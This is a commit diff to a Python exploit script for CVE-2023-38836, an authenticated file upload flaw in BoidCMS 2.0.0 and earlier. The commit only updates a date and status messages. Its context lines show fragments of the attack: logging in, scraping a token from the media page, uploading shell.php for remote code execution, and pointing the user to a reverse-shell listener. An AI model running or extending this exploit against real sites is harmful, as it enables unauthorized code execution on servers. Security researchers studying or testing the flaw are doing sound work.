feat: show path after uploading

1337kid · Jul 5, 2024 · 10030c3 · 10030c3
1 parent 1a7dade
commit 10030c3
Showing 1 changed file with 4 additions and 3 deletions.
diff --git a/CVE-2023-38836.py b/CVE-2023-38836.py
@@ -1,7 +1,7 @@
 #!/usr/bin/python3
 # Exploit Title: BoidCMS <= 2.0.0 - Authenticated file upload vulnerability
 # Date: 08/21/2023
-# Updated on: 6/23/2024
+# Updated on: 07/05/2024
 # Exploit Author: 1337kid
 # Vendor Homepage: https://boidcms.github.io/#/
 # Software Link: https://boidcms.github.io/BoidCMS.zip
@@ -51,7 +51,7 @@
 		exit()
 	print("[+] Logged in successfully")
 	#=========== File upload to RCE
-	print("[+] Uploading shell")
+	print("[+] Uploading shell.php")
 	req=s.get(f'{base_url}/admin?page=media')
 	token=re.findall('[a-z0-9]{64}',req.text)
 	form_upld_data={
@@ -68,4 +68,5 @@
 	if req.status_code == '404':
 		print("[-] Upload failed")
 		exit()
-	print(f'[+] Check the listener at {args.lhost}:{args.lport}')
+	print(f'[+] Uploaded to {base_url}/media/shell.php')
+	print(f'[+] Check the listener at {args.lhost}:{args.lport}')